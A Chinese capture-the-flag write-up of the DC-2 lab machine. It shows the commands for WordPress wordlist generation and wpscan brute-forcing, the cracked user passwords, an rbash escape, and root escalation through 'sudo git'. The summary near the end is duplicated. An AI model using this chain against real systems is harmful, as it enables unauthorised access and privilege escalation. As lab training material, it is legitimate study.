靶机-DC2

查找同网段ip

nmap查端口

host文件地址：C:\Windows\System32\drivers\etc

发现无法正常访问页面，但在url地址栏会有http://dc-2域名提示，发现问题是本地无法解析域名dc-2

这时候就意识到对方可能做了重定向，在本机的host文件中加入ip地址和域名：

192.168.253.157 dc-2

成功访问

找到flag1

翻译一下

你通常的单词表可能不起作用，所以，也许你只需要保持冷静。

密码越多越好，但有时你无法赢得所有密码。

以一个身份登录以查看下一个标志。

如果找不到，请以其他身份登录。

cewl是kali自带的脚本工具

cewl是一个ruby应用，爬行指定url的指定深度。也可以跟一个外部链接，结果会返回一个字典，这个字典可以传给其他工具进行密码暴力破解。（简单理解就是利用爬取到的网站的内容去生成字典）

-m：用于指定最终生成字典中字符最小长度，只有超过指定长度才会记录到字典中

-d：爬取地址/网站的深度，一般默认是2

-e：收集包含email地址信息

-c：统计每个字符串出现的次数

-v：显示爬取过程中的详细信息

-w：将爬取到的字符串写入到指定文档

--debug：开启调试模式，这样就可以查看网站爬取过程中出现的错误和元数据了

--with-numbers：生成包含数字和字符的字典文件

--auth_type ，--auth_user， --auth_pass：目标网站需要进行页面登录认证的话，使用该参数来绕过页面认证的限制

--proxy_port：目标网站设置了代理服务器的话，–proxy option选项来启用代理URL功能，默认端口是8080

–proxy_host：代理主机地址

–proxy_username：代理的账户名

–proxy_password：代理的密码

wappalyzer查看网站信息

根据网站利用cewl生成密码并写入文档：

cewl -w dc-passwd.txt http://dc-2

网站的CMS为WordPress，那我们就可以使用wpscan对网站进行扫描：

wpscan是一款专门针对wordpress的扫描工具，采用ruby语言编写，能够扫描worpress网站中包括主题漏洞、插件漏洞以及wordpress网站本身存在的漏洞。wpscan还可以扫描wordpress网站启用的插件和其他功能。

wpscan --url "【目标系统URL】"

wpscan --url "【目标系统URL】" --enumerate t
可以着重性的扫描目标系统的主题

wpscan --url "【目标系统URL】" --enumerate vt
可以着重对wordpress系统的主题方面的漏洞进行扫描

wpscan --url "【目标系统URL】" --enumerate p
可以着重对WordPress的插件进行扫描

wpscan --url "【目标系统URL】" --enumerate vp
可以着重对WordPress的插件漏洞进行扫描

wpscan --url "【目标系统URL】" --enumerate u
可以对WordPress的用户进行枚举

wpscan --url "【目标系统URL】"  --wordlist 【密码字典文件】 --username 【用户名】
即可进行wordpress用户名和密码的暴力破解

上述命令参数如果不存在，可以尝试执行命令：

wpscan --url "http://124.70.71.251:45419/" -P "【密码文件路径】" --usernames admin

TimThumbs是wordpress的常用文件，主要和缩略图的使用有关，wpscan有针对TimThumbs文件的扫描命令。执行命令：
wpscan --url "【目标系统URL】" --enumerate tt

爆破之后得到两组用户名和密码

wpscan --url http://dc-2/ -U user.txt -P dc-passwd.txt

jerry：adipiscing

tom:parturient

dirb http://dc-2

nikto扫一下

访问网站登录页面

http://dc-2/wp-login.php

发现flag2

翻译

如果你不能利用WordPress并采取快捷方式，还有另一种方法。

希望你找到了另一个切入点。

提示不能利用WordPress了

由于7744端口开着，使用ssh

找到flag3

发现cat不执行

vi查看

可怜的老汤姆总是追着杰瑞跑。也许他应该为自己造成的所有压力道歉。

提示jerry和su

绕过也许

BASH_CMDS[a]=/bin/sh;a       #注：把 /bin/sh 给a变量并调用
export PATH=$PATH:/bin/      #注：将 /bin 作为PATH环境变量导出
export PATH=$PATH:/usr/bin   #注：将 /usr/bin 作为PATH环境变量导出

还要用绕过

登录成功后切换到jerry的家目录，发现flag4

很高兴看到你已经走了这么远，但你还没有回家。

你仍然需要得到最终的标志（唯一真正重要的标志！！）。

这里没有提示-你现在只能靠自己了。：-）

快离开这里！！！！

提示中有git

查看可以使用root权限的命令，发现git可以使用，通过git提权

sudo -l

提权：

1、sudo git help config #在末行命令模式输入 
!/bin/bash 或 !'sh' #完成提权 
2、sudo git -p help 
!/bin/bash #输入!/bin/bash，即可打开一个用户为root的shell

这两种方式的前提是把shell窗口变小，使得不能在一页全部显示，才可以输入。

如果不能输入，说明你的shell窗口不够小。

找到最后flag

• 修改 hosts 文件来访问网站。
• 使用 cewl 制作字典。
• 使用 wpscan 对 WordPress 站点进行扫描和爆破。
• rbash 绕过
• sudo 提权
• git 提权

ser-images\image-20211108173501687.png)

如果不能输入，说明你的shell窗口不够小。

找到最后flag

• 修改 hosts 文件来访问网站。
• 使用 cewl 制作字典。
• 使用 wpscan 对 WordPress 站点进行扫描和爆破。
• rbash 绕过
• sudo 提权
• git 提权